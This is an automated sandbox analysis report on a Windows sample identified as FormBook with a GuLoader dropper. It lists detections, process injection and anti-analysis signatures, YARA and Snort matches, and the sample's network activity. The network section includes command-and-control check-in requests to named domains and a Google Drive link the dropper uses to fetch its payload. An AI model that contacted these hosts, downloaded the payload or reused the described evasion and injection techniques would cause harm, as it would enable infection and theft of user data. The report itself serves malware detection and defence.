Analysis Report 211094.exe

Overview

General Information

Sample Name: 211094.exe
Analysis ID: 358423
MD5: a2bc516696c51f3afdd8721d6c782360
SHA1: 2fa5f1d52a9a80b01972cf840b5a3ffffb6be0a4
SHA256: d86226973ffce253c068344a37b83a3e0460cb5331e0d3f0cde729aa62827761
Tags: Formbook

Detection

FormBook GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 211094.exe (PID: 6984 cmdline: 'C:\Users\user\Desktop\211094.exe' MD5: A2BC516696C51F3AFDD8721D6C782360)
    • 211094.exe (PID: 1872 cmdline: 'C:\Users\user\Desktop\211094.exe' MD5: A2BC516696C51F3AFDD8721D6C782360)
      • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • explorer.exe (PID: 776 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
          • cmd.exe (PID: 6648 cmdline: /c del 'C:\Users\user\Desktop\211094.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Multi AV Scanner detection for submitted file
Source: 211094.exe | ReversingLabs: Detection: 22%
Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.587932425.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.404736024.000000001E290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.399177906.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: 9.2.explorer.exe.983ea0.0.unpack | Avira: Label: TR/Dropper.Gen
Source: 9.2.explorer.exe.4fc7960.5.unpack | Avira: Label: TR/Dropper.Gen

Compliance:

Uses 32bit PE files
Source: 211094.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Uses secure TLS version for HTTPS connections
Source: unknown | HTTPS traffic detected: 142.250.184.65:443 -> 192.168.2.6:49727 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: explorer.pdbUGP source: 211094.exe, 00000004.00000002.407424749.000000001E7F0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000000.384686029.000000000DC20000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: 211094.exe, 00000004.00000002.404809631.000000001E4C0000.00000040.00000001.sdmp, explorer.exe, 00000009.00000002.591474852.0000000004BAF000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: 211094.exe, explorer.exe
Source: Binary string: explorer.pdb source: 211094.exe, 00000004.00000002.407424749.000000001E7F0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000000.384686029.000000000DC20000.00000002.00000001.sdmp

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49743 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49743 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49743 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49751 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49751 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49751 -> 34.102.136.180:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 34.98.99.30:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 34.98.99.30:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49752 -> 34.98.99.30:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 198.54.117.211:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 198.54.117.211:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49753 -> 198.54.117.211:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 18.189.205.91:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 18.189.205.91:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49759 -> 18.189.205.91:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 199.79.62.169:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 199.79.62.169:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49760 -> 199.79.62.169:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 185.230.60.102:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 185.230.60.102:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49763 -> 185.230.60.102:80
Source: global traffic | HTTP traffic detected: GET /iae2/?Cb=Rufvx1jOsytop1bvq44D8J5BrA1Sf94ZUOtMBwRkz2TXMocihNedTu7uPJah09VVn9/XRzeeTw==&uVjH=yVCTVb0XT254cnY HTTP/1.1 Host: www.guidedcommercialloan.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iae2/?Cb=e6cahffjztzcamJ4O+DKrhaQB5hRPzkwIvwlBHpDvSFa4AI+euUXko8WJypl60YQUdNY72tcfQ==&uVjH=yVCTVb0XT254cnY HTTP/1.1 Host: www.discbrakepart.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iae2/?Cb=0/NeuyozxGBDMX4HAZN4yfkirUgQuZO/PqS7luZp/cW8TZEJ+m/Qgd9wiqPWKwH99MCiE7v8pw==&uVjH=yVCTVb0XT254cnY HTTP/1.1 Host: www.truckrev.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iae2/?Cb=y5UfgZt3axNXxKUKNxQBC2DBWQuEwdDoKwpextWmXL4AH1jfcUOFtuVQVuhxYhhogQppfaQ4MQ==&uVjH=yVCTVb0XT254cnY HTTP/1.1 Host: www.quartiercreole.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iae2/?Cb=zuFquqmMcvMIVTA8KC8hAytFTzaQhDtWEj5Y6a4mHxGfCyQF/Xb/aYQpFx1LlkGMT0GVZlYKNw==&uVjH=yVCTVb0XT254cnY HTTP/1.1 Host: www.wissinkadams.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iae2/?Cb=0E3C5mUHlRauL0/Y7Bp5k7qydJv7c0I2M1waktstgn1SsRqH7XaUeeB0rPzY/gY6TfHCuVFaFw==&uVjH=yVCTVb0XT254cnY HTTP/1.1 Host: www.shopping-container.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iae2/?Cb=VoDnAKif46zuoDGUOYPF8CFht3P91IwI50ppSsuc6FjbQwYrNosv2kcASbfxHajA03pQPAi11g==&uVjH=yVCTVb0XT254cnY HTTP/1.1 Host: www.azhello.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iae2/?Cb=M0uFvISRXYRHVkOb0AJBAd7B/InOE9ksckU2zFobX8RttE5IKM9SRPMAdsze42ip49A2WvKiMw==&uVjH=yVCTVb0XT254cnY HTTP/1.1 Host: www.africabiocity.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iae2/?Cb=tlIjdtxg+6ss6GeFkxkNX/Gta+EnXEkPHxZQNKO5opTQPj/ZdNFPdnHw1EJZhrtLdJv1ORZ2Rg==&uVjH=yVCTVb0XT254cnY HTTP/1.1 Host: www.nhadat9chu.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iae2/?Cb=2Mu6jGWgIoofF63Ti3l/Zo55WQUYmkW4MO9hv8QsoUu7nlZl5gregCIikYrtIUhyBUOiCNofoA==&uVjH=yVCTVb0XT254cnY HTTP/1.1 Host: www.kfs.ltd Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /iae2/?Cb=AbpHtwwPcjqVDvg4bYXWsG8P5KsLAA+yhQvslNw16RaUmuaJNxrIVWhvxUk5BU5rJ318S0XyEg==&uVjH=yVCTVb0XT254cnY HTTP/1.1 Host: www.lvlyourlife.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | IP Address: 160.153.136.3
Source: Joe Sandbox View | ASN Name: PUBLIC-DOMAIN-REGISTRYUS
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown | DNS traffic detected: queries for: doc-0k-78-docs.googleusercontent.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 25 Feb 2021 14:49:41 GMT Content-Type: text/html Content-Length: 153 Connection: close Server: nginx/1.16.1 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000006.00000002.588091491.000000000095C000.00000004.00000020.sdmp | String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000006.00000000.383924235.000000000B1A6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: 211094.exe | String found in binary or memory: https://drive.google.com/uc?export=download&id=1wx8v1bksmyfmjfmnDtrZxoKIzOnkTyrU
Source: explorer.exe, 00000009.00000002.592642796.0000000005142000.00000004.00000001.sdmp | String found in binary or memory: https://www.kfs.ltd/iae2?Cb=2Mu6jGWgIoofF63Ti3l%2FZo55WQUYmkW4MO9hv8QsoUu7nlZl5gregCIikYrtIUhyBUOiCN
Source: unknown | Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown | HTTPS traffic detected: 142.250.184.65:443 -> 192.168.2.6:49727 version: TLS 1.2

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.587932425.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.404736024.000000001E290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.399177906.0000000000080000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.587412850.00000000006F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.587981327.0000000000B30000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.587932425.0000000000B00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.587932425.0000000000B00000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.404736024.000000001E290000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.404736024.000000001E290000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.587887659.0000000000983000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
Source: 00000004.00000002.399177906.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.399177906.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.592534520.0000000004FC7000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 | Author: Florian Roth
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_02295C7C NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_022904A2 EnumWindows,NtSetInformationThread,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_02292D2E NtSetInformationThread,NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_02296167 NtSetInformationThread,NtWriteVirtualMemory,NtResumeThread,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_02291627 NtSetInformationThread,NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_0229261A NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_02294E54 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_0229228C NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_022962EF NtResumeThread,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_022962F2 NtResumeThread,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_022922F5 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_022926D9 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_022927BD NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_022927DC NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_02293C21 NtSetInformationThread,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_02292831 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_02296405 NtResumeThread,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_02292455 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_022924A9 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_022904AB EnumWindows,NtSetInformationThread,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_0229288F NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_022928ED NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_0229213D NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_02290500 NtSetInformationThread,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_02290504 NtSetInformationThread,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_0229256D NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_0229056D NtSetInformationThread,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_0229616D NtResumeThread,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_022905BD NtSetInformationThread,TerminateProcess,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_02292999 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_0229659C NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_02292D95 NtSetInformationThread,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_02292596 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_022929CD NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 0_2_022925CE NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E5296E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E5297A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E5295D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E5298F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E5299A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529650 NtQueryValueKey,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E5296D0 NtCreateKey,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E52A770 NtOpenThread,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529770 NtSetInformationFile,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529760 NtOpenProcess,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E52A710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529560 NtWriteFile,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E52AD30 NtSetContextThread,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E5295F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529A10 NtQuerySection,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529B00 NtSetValueKey,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E52A3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E52B040 NtSuspendThread,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529820 NtEnumerateKey,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E5298A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E529950 NtQueueApcThread,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_1E5299D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_00565C7C NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_00566167 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_00566405 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_0056616D NtQueryInformationProcess,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_005662F2 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\211094.exe | Code function: 4_2_005662EF NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04AF95D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04AF9540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04AF96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04AF96D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04AF9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 9_2_04AF9650 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_04AF9FE0 NtCreateMutant,LdrInitializeThunk,
